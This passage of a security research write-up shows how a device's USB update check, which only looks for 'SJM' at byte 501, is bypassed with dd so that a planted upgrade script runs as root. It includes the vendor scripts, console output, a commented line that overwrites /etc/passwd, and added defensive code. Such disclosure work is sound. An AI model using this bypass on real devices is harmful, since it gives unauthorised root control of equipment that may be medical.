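            findings.append((user, "DEFAULT_SHELL"))
    return findings


if __name__ == "__main__":
    for account, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"{account:10} {finding}")
```

Accounts that combine `GID0_NOT_ROOT` with `DEFAULT_SHELL` are the ones to give a non-login shell or remove, since the `*` in the password field is the only thing keeping them closed.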
<br />
== Taking Things Further ==<br />
<br />
Let's look at some of these custom hotplug scripts. /etc/hotplug/usb/sjmusb looks like a good start.<br />
<br />
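`check_sign` in the script that follows accepts any drive whose first partition has the bytes `SJM` at offset 501, which marks a drive but authenticates nothing stored on it. This added Python example (not the vendor's code or the original page's) models that check beside one that authenticates the drive's files; the key, file contents and helper names are constructed, and HMAC stands in for a public-key signature, which a real device would use so that no signing secret is stored on it.

```python
import hashlib
import hmac

# Offset and magic bytes as used by check_sign in the sjmusb script.
SIGN_OFFSET = 501
SIGN_MAGIC = b"SJM"

# Constructed demo values (assumptions, not taken from the device).
DEMO_KEY = b"constructed-demo-key"
VENDOR_FILES = {
    "etc/init.d/upgrade_script.sh": b"#!/bin/sh\necho vendor update\n",
}


def marker_check(partition: bytes) -> bool:
    """Model of check_sign: three bytes at offset 501 must read 'SJM'."""
    end = SIGN_OFFSET + len(SIGN_MAGIC)
    return partition[SIGN_OFFSET:end] == SIGN_MAGIC


def manifest_digest(files: dict) -> bytes:
    """Hash every path and its content in a fixed order.

    The length prefix keeps differently split path names from
    producing the same byte stream.
    """
    h = hashlib.sha256()
    for path in sorted(files):
        name = path.encode()
        body = hashlib.sha256(files[path]).digest()
        h.update(len(name).to_bytes(4, "big") + name + body)
    return h.digest()


def make_tag(files: dict, key: bytes) -> bytes:
    """Build side: authenticate the whole file set, not a marker."""
    return hmac.new(key, manifest_digest(files), hashlib.sha256).digest()


def authenticated_check(files: dict, tag: bytes, key: bytes) -> bool:
    """Device side: recompute the tag and compare in constant time."""
    return hmac.compare_digest(make_tag(files, key), tag)


def _partition(marker: bytes) -> bytes:
    """Constructed 512-byte first sector with `marker` at offset 501."""
    sector = bytearray(512)
    sector[SIGN_OFFSET:SIGN_OFFSET + len(marker)] = marker
    return bytes(sector)


def compare() -> dict:
    """Run both checks over constructed drives and return the verdicts."""
    tag = make_tag(VENDOR_FILES, DEMO_KEY)
    edited = dict(VENDOR_FILES)
    edited["etc/init.d/upgrade_script.sh"] = b"#!/bin/sh\necho edited\n"
    extra = {**VENDOR_FILES, "etc/extra.sh": b"#!/bin/sh\n"}
    return {
        # The marker check never looks at the files at all.
        "marker_blank": marker_check(_partition(b"\x00\x00\x00")),
        "marker_marked": marker_check(_partition(SIGN_MAGIC)),
        # The authenticated check fails on any edited or added file.
        "auth_original": authenticated_check(VENDOR_FILES, tag, DEMO_KEY),
        "auth_edited": authenticated_check(edited, tag, DEMO_KEY),
        "auth_extra": authenticated_check(extra, tag, DEMO_KEY),
    }


if __name__ == "__main__":
    for name, verdict in compare().items():
        print(f"{name:14} {verdict}")
```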
<pre>#!/bin/bash<br />
#<br />
# Script to mount valid sjm pendrive(s) via hotplug. Hotplug will invoke <br />
# this script only if the attached USB device is a mass-storage device.<br />
# hotplug does this by looking at the device class of the attached usb device<br />
# See /etc/hotplug/usb.usermap. The device class for mass storage devices<br />
# is ______<br />
# <br />
# In a nutshell, the script looks in /proc/scsi/usb-storage* directory to<br />
# find the scsi ID of the attached USB storage device. It then goes on to<br />
# find the device node corresponding to this scsi ID.<br />
# <br />
# version 1.1 - Added USB signature check functionality <br />
#<br />
# For the new cellular adapters - viz mobidata and velocity, ignore the<br />
# mass storage interface reported. Please see comments at the top of<br />
# /etc/hotplug/usb/velocity for details.<br />
#<br />
# - Ashok Iyer (16-Jun-2010)<br />
#<br />
<br />
export PATH=/usr/bin:/usr/local/bin:$PATH<br />
<br />
MOUNT_PATH="/mnt/sjmpendrives"<br />
MOUNT_NUMBER=1<br />
LOG_FILE="/tmp/usbstorage.log"<br />
SGMAP="sg_map"<br />
<br />
<br />
# The functions in this script rely on "echo" to pass information to each<br />
# other. If you need to modify this script, do not use "echo" for debugging.<br />
# Instead use the feedback()/error_exit() functions below. These will log <br />
# information to a log file and do not interfere with information passing <br />
# between functions.<br />
<br />
***snip***<br />
<br />
function check_sign {<br />
local node1=$1"1"<br />
feedback "Checking signature ... "<br />
feedback "node1 = $node1"<br />
dd if=$node1 of=/tmp/.sign bs=1 count=3 skip=501<br />
signature=`cat /tmp/.sign` <br />
<br />
if [ "$signature" = "SJM" ]; then<br />
feedback "Valid pendrive"<br />
echo 0<br />
else<br />
feedback "Invalid pendrive"<br />
echo -1<br />
fi<br />
}<br />
<br />
***snip***<br />
<br />
# We only mount the first partition of a USB storage device. There is no <br />
# requirement to mount multiple partitions. Makes the job easy :-)<br />
function mount_scsi_dev {<br />
    local scsi_dev=$1<br />
    local mountpt=""<br />
<br />
    # check if the first partition of the device is mounted<br />
    if ! mount | egrep -q "^$scsi_dev"1"[[:space:]]"<br />
    then<br />
        mountpt=$(find_unused_mountpt) || error_exit "Failed to find a mount pt"<br />
        mkdir -p "$mountpt" || error_exit "Failed to create mount pt $mountpt"<br />
<br />
        # FIXME- Ugly hack to detect partitions on USB flash drive<br />
        # Possible bug in Kernel and/or devfs. Either use devfs=nomount kernel cmdline<br />
        # or fix devfs once and for all.<br />
        # There is another problem in devfs that after the USB flash disk is removed<br />
        # the corresponding devfs partitions (part1, part2 etc...) still show up.<br />
        foobar=`ls -l $scsi_dev | awk '{print $11}'`<br />
        dd if=/dev/$foobar of=/dev/null bs=1 count=1<br />
<br />
        # Checking USB signature<br />
        ret=`check_sign $scsi_dev`<br />
        if [ $ret -eq 0 ]; then<br />
            feedback "Valid pendrive"<br />
        else<br />
            # Tanto: Inform the Exec App to show<br />
            # an Invalid Media Error<br />
            if [ -p /tmp/remoteInt.pipe ]; then<br />
                echo "UsbHotplug InvalidMedia" > /tmp/remoteInt.pipe<br />
                error_exit "Invalid pendrive"<br />
            else<br />
                echo "ERROR: /tmp/remoteInt.pipe does not exist!!!"<br />
            fi<br />
        fi<br />
<br />
        feedback "Mounting $scsi_dev"1" on $mountpt"<br />
        mount -t auto $scsi_dev"1" $mountpt<br />
        if [ "$?" -eq 0 ]; then<br />
            feedback "$scsi_dev"1" is now mounted on $mountpt"<br />
            feedback "Launch application specific script"<br />
            sh /etc/launch_appln.sh $mountpt<br />
        else<br />
            feedback "Mount error for $scsi_dev"<br />
        fi<br />
    else<br />
        feedback "Ignoring $scsi_dev - already mounted"<br />
    fi<br />
}<br />
<br />
# Find and mount all attached USB storage devices<br />
function mount_all_attached {<br />
    local scsiuniqid=""<br />
    feedback "Find and mount all attached usb storage devices"<br />
<br />
    for scsiuniqid in $(allusb_scsiuniqid)<br />
    do<br />
        local scsidev="`diskdev_from_uniqid $scsiuniqid`"<br />
        if [ "$scsidev" == "UNKNOWN" ]; then<br />
            sleep 1<br />
        fi<br />
        mount_scsi_dev $scsidev<br />
    done<br />
}<br />
<br />
***snip***<br />
<br />
<br />
# The remover script will be invoked when the device is removed. This is<br />
# useless in a way because umount will have no effect. The only benefit is<br />
# that the "mount" command will not show stale entries.<br />
<br />
# FIXME - Need to add specialized LOGIC to selectively umount USB flash drive <br />
# which is removed ( unlike umounting all attached USB flash drives )<br />
feedback "REM = $REMOVER"<br />
if [ -f $REMOVER ]; then<br />
    echo '/bin/umount /mnt/sjmpendrives/*' >> $REMOVER<br />
else<br />
    echo -e '#!/bin/sh\n/bin/umount /mnt/sjmpendrives/*' > $REMOVER<br />
fi<br />
<br />
# Inform the Export data script when pendrive is unplugged.<br />
echo -e '\nps -A | grep export_data \nif [ $? -eq 0 ]; then \n\tif [ -p /tmp/usbDataExport.pipe ]; then \n\t\t echo "Hotplug umount" > /tmp/usbDataExport.pipe \n\tfi\nfi' >> $REMOVER<br />
chmod a+x $REMOVER<br />
<br />
mount_all_attached</pre><br />
<br />
Let's look inside /etc/launch_appln.sh.<br />
<br />
<pre>#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
    echo "usage: ./launch_appln.sh /mnt/pendrive"<br />
    exit<br />
fi<br />
<br />
# FIXME<br />
# This script may be invoked by hotplug<br />
# Do not run the script if it is already running<br />
# updater or data export<br />
<br />
mountpt=$1<br />
script_path=/apps/tanto/<br />
<br />
if [ -f $mountpt/version.ini ]; then<br />
    # call updater script<br />
    echo "Launching updater script"<br />
    if [ -f $mountpt/etc/init.d/upgrade_script.sh ]; then<br />
        sh $mountpt/etc/init.d/upgrade_script.sh $mountpt > /tmp/debugUpdater.txt 2>&1<br />
        umount /mnt/sjmpendrives/1<br />
        umount /mnt/pendrive<br />
    else<br />
        umount /mnt/sjmpendrives/1<br />
        umount /mnt/pendrive<br />
        exit 0<br />
    fi<br />
else<br />
    # Call Data export script<br />
    echo "Launching export data script"<br />
    sh $script_path/export_data.sh $mountpt<br />
    umount /mnt/sjmpendrives/1<br />
    umount /mnt/pendrive<br />
fi</pre><br />
<br />
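It looks like their pendrive "signature" is fairly easy to get around: check_sign only compares the three bytes at offset 501 of the first partition against the string "SJM".<br />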
<br />
<pre>rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00116472 s, 2.6 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 00 00 00 |...|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ hd .sign_mod<br />
00000000 53 4a 4d |SJM|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00700994 s, 0.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00123249 s, 2.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 53 4a 4d |SJM|<br />
00000003</pre><br />
<br />
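Next, we add the files that launch_appln.sh looks for (version.ini and etc/init.d/upgrade_script.sh) to the drive, using a small script of our own as the upgrade script.<br />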
<br />
<pre>rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ ls -lahR<br />
.:<br />
total 36K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 .<br />
drwxr-x---+ 8 root root 4.0K May 14 11:02 ..<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 etc<br />
-rw-r--r-- 1 rjmendez rjmendez 620 May 14 06:01 passwd<br />
-rw-r--r-- 1 rjmendez rjmendez 4 May 10 17:07 version.ini<br />
<br />
./etc:<br />
total 24K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 ..<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 init.d<br />
<br />
./etc/init.d:<br />
total 24K<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 ..<br />
-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh<br />
<br />
rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh <br />
#!/bin/sh<br />
function led_off {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b0<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_dim {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b1<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_bright {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b2<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function party_mode {<br />
counter=0<br />
while [ $counter -lt $1 ];<br />
do<br />
led_off<br />
sleep 0.05<br />
led_dim<br />
sleep 0.05<br />
led_bright<br />
sleep 0.05<br />
let counter=counter+1<br />
done<br />
}<br />
<br />
/etc/init.d/tantoapp stop<br />
#cp /mnt/sjmpendrives/1/passwd /etc/passwd<br />
echo "This worked!" > /root/diditwork.txt<br />
if [ -f /root/diditwork.txt ];<br />
then<br />
party_mode 15<br />
else<br />
echo "It did not work..."<br />
fi</pre><br />
<br />
This is the output that we get from the console.<br />
<br />
<pre>operator@(none):~$ su root<br />
Password: <br />
PAM_unix[265]: (su) session opened for user root by (uid=12)<br />
root@(none):~# hub.c: new USB device usb-mx2hci-2, assigned address 2<br />
scsi0 : SCSI emulation for USB Mass Storage devices<br />
Vendor: Lexar Model: USB Flash Drive Rev: 1100<br />
Type: Direct-Access ANSI SCSI revision: 02<br />
Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0<br />
SCSI device sda: 31285248 512-byte hdwr sectors (16018 MB)<br />
sda: Write Protect is off<br />
Partition check:<br />
/dev/scsi/host0/bus0/target0/lun0: p1<br />
modprobe: Can't locate module /dev/sg1<br />
modprobe: Can't locate module /dev/sg2<br />
modprobe: Can't locate module /dev/sg3<br />
modprobe: Can't locate module /dev/sg4<br />
modprobe: Can't locate module /dev/sg5<br />
modprobe: Can't locate module /dev/sdb<br />
modprobe: Can't locate module /dev/sdc<br />
modprobe: Can't locate module /dev/sdd<br />
modprobe: Can't locate module /dev/sde<br />
modprobe: Can't locate module /dev/sdf<br />
modprobe: modprobe: Can't locate module nls_cp437<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
ls /root<br />
devel_install.sh diditwork.txt setdev.sh setlog.sh<br />
root@(none):~# cat /root/diditwork.txt <br />
This worked!<br />
root@(none):~# cat /tmp/usbstorage.log <br />
+++ Starting USB (un)mounter script for device /proc/bus/usb/001/002<br />
REM = /var/run/usb/%proc%bus%usb%001%002<br />
Find and mount all attached usb storage devices<br />
usb proc-fs yields SCSI host number=0 - suffix with zeroes (kernel 2.4)<br />
Use sgmap to match 0:0:0:0.<br />
Waiting for device id to appear...<br />
SCSI disk for 0:0:0:0 is /dev/sda<br />
Checking /mnt/sjmpendrives/1<br />
Mountpoint /mnt/sjmpendrives/1 is free<br />
Checking signature ... <br />
node1 = /dev/sda1<br />
Valid pendrive<br />
Valid pendrive<br />
Mounting /dev/sda1 on /mnt/sjmpendrives/1<br />
/dev/sda1 is now mounted on /mnt/sjmpendrives/1<br />
Launch application specific script</pre><br />
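
The log shows the whole trust decision: three marker bytes match, the partition is mounted, and whatever script is on it runs as root. As an added example (not the device's code and not from the original page), the functions below keep the marker check for contrast and show a detached-signature check done on a staged copy of the upgrade script; the `.sig` file name, the public-key location and the staging directory are assumptions.

```shell
#!/bin/sh
# Added example, not the device's code. Assumptions: a public key stored in
# the read-only firmware image and a detached signature shipped on the drive.

# marker_check IMAGE: the page's check_sign logic applied to a regular file.
# Any image with "SJM" at byte offset 501 passes, whatever else it holds.
marker_check() {
    [ "$(dd if="$1" bs=1 count=3 skip=501 2>/dev/null)" = "SJM" ]
}

# verify_update MOUNTPT PUBKEY WORKDIR
# Prints the path of a verified private copy of the upgrade script, or
# returns non-zero and prints nothing.
verify_update() {
    mountpt=$1 pubkey=$2 workdir=$3
    src="$mountpt/etc/init.d/upgrade_script.sh"
    sig="$src.sig"                       # hypothetical file name
    staged="$workdir/upgrade_script.sh"  # WORKDIR must be on device storage

    [ -f "$src" ] && [ -f "$sig" ] && [ -f "$pubkey" ] || return 1

    # Copy first, verify the copy, run the copy: removable media can return
    # different bytes on a second read, so nothing is re-read after the check.
    rm -f "$staged" "$staged.sig"
    cp "$src" "$staged" && cp "$sig" "$staged.sig" || return 1

    if openssl dgst -sha256 -verify "$pubkey" \
            -signature "$staged.sig" "$staged" >/dev/null 2>&1; then
        chmod 0500 "$staged"
        echo "$staged"
    else
        rm -f "$staged" "$staged.sig"
        return 1
    fi
}
```

The caller runs only the path that `verify_update` prints and never executes the file on the mount point.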
<br />
== Party Mode Demo ==<br />
{{#ev:youtube|cNcGebu8NRs}}</div>
Rjmendez